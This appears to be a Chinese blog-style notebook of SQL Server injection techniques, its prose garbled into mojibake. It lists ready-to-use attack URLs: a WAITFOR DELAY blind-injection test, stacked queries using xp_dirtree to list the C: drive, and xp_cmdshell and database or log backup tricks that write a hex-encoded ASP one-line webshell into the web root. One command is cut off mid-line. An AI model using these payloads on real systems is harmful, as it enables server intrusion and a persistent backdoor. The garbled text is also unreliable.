SQL Server×¢Èë±Ê¼Ç
ÔÚһЩ´ó¹«Ë¾£¬Í¨³£¶¼ÊÇʹÓÃmysql+php+apacheµÄ¾Ó¶à£¬¶ÔMicrosoft SQL Server ×¢ÈëʵսÏà¶Ô¾Í½ÏÉÙ£¬Æ½Ê±ÔÚ´¦Àí©¶´»òÕß²âÊÔʱ£¬¶ÔÓÚһЩÓÐѧϰ¼ÛÖµµÄ×¢Èë²âÊÔ˼·¡¢sqlÓï¾ä¶¼»áÎı¾±¸ÍüÏ£¬ÕâÀïË÷ÐԾͽ«sql server×¢Èë±Ê¼Ç·ÅÉÏÀ´£¬±ãÓÚ²éѯ¡£
ÔÚһЩäעÖУ¬ÓÈÆäÊÇûÓйý¶à´íÎó»ØÏÔÐÅÏ¢µÄÇé¿öÏ£¬ÈôÓï¾äÖ´Ðгɹ¦¾Í·µ»ØÕý³££¬Èôʧ°Ü¾Íµ¯¿òÌáʾ¡°·þÎñÆ÷Á¬½Ó³¬Ê±¡±Ö®ÀàµÄ´íÎóÌáʾ£¬Á¬±¬±í¡¢±¬×ֶεĻú»á¶¼Ã»ÓС£×î³õ£¬²éѯdb_owner¡¢sysadmin¡¢xp_cmdshell¶¼ÊÇÓÐȨÏ޵ģ¬ÈçÏÂËùʾ£º µ«ÊÇ£¬Ã¿´ÎÓÃsqlmqpµÄ--sql-shellµÄ¹¦ÄÜÖ´ÐÐinsert×ÜÊÇʧ°Ü¡£ºóÀ´Ö±½ÓÔÚä¯ÀÀÆ÷ÉϲâÊÔinsertÓï¾ä·¢ÏÖÖ´ÐÐʧ°Ü£¬¿É¼ûsqlmapµÄsql-shell¹¦ÄܶÔÓï¾äÊÇ·ñÖ´Ðй¦ÄܵÄÅжϻ¹ÊDZȽÏÓÐÏ޵ģ¬É¶Ò²Ã»·µ»Ø¡£ 1¡¢ÅжÏ×¢Èë´ó¶àÊÇand 1=1Ö®ÀàµÄÓï¾ä£¬Ò²¾³£±»¹ýÂ˵ô,ÕâÀﱸÍüÏÂsql server»ùÓÚʱ¼äµÄ×¢ÈëÅжϣº test.aspx?ID=300 WAITFOR DELAY '0:0:5'-- 2¡¢×î³õͨ¹ýxp_regread¶Áȡע²á±íÖµÀ´»ñÈ¡web·¾¶£ºHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots,µ«ÊÇ·µ»ØΪ¿Õ£¬ÓÚÊǾͲÉÓÃÏÂÁз½·¨±éÀúCÅÌ£¬²¢½«½á¹ûдÈëÁÙʱ±íÖÐ(×¢Ò⣺ÔÚÖ´ÐÐÀ©Õ¹´æ´¢¹¦ÄÜʱ£¬Ëù´´½¨µÄ±í¶ÎÓ¦ÓÚÀ©Õ¹´æ´¢¹¦ÄܵIJÎÊýÏàÒ»Ö£¬·ñÔò»á³ö´í!)£º test.aspx?ID=300;CREATE TABLE TMP([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL);insert into tmp exec master..xp_dirtree 'c:/',1,1 ÓÃsqlmap°Ñ±íTMPÖеÄÖµÅܳöÀ´£º ±ÈÈçÕ¾µãÖ÷Ŀ¼λÓÚĬÈÏ·¾¶C:/inetpub/wwwroot£¬ÄÇôͨ¹ýÒÔÏÂÃüÁî¿ÉдÈëÒ»¾ä»°Ä¾Âí£¬ÆäÖеÄÖÐÀ¨ºÅÇ°ÃæÐèҪʹÓÃ^תÒ壺 test.aspx?ID=300;exec master..xp_cmdshell 'echo ^ test.asp?ID=300;backup database Êý¾Ý¿âÃû to disk='c:/inetpub/wwwroot/d.asp' WITH DIFFERENTIAL,FORMAT;-- Ö»±¸·Ý²îÒìÊý¾Ýµ½aspÎļþÖÐ »òÕßͨ¹ýlog±¸·ÝдÈ룺 test.asp?ID=300;alter database dbname set RECOVER FULL; ÉèÖÃÊý¾Ý¿âΪÍêÈ«»Ö¸´Ä£Ê½£¬ÒÔÔÊÐí±¸·ÝÈÕÖ¾ test.asp?ID=300;create table cmd(a image); test.asp?ID=300;backup log dbname do disk='c:\cmd' with init; ³õʼ»¯ÈÕÖ¾ test.asp?ID=300;insert into cmd(a) values(0x3C25657865637574652872657175657374282261222929253E); ²åÈëÒ»¾ä»°Ä¾Âí test.asp?ID=300;backup log dbname to disk='c:/inetpub/wwwroot/d.asp';drop table cmd;-- ±¸·Ý°üº¬Ä¾ÂíµÄÈÕÖ¾£¬²¢É¾³ý´´½¨±í
|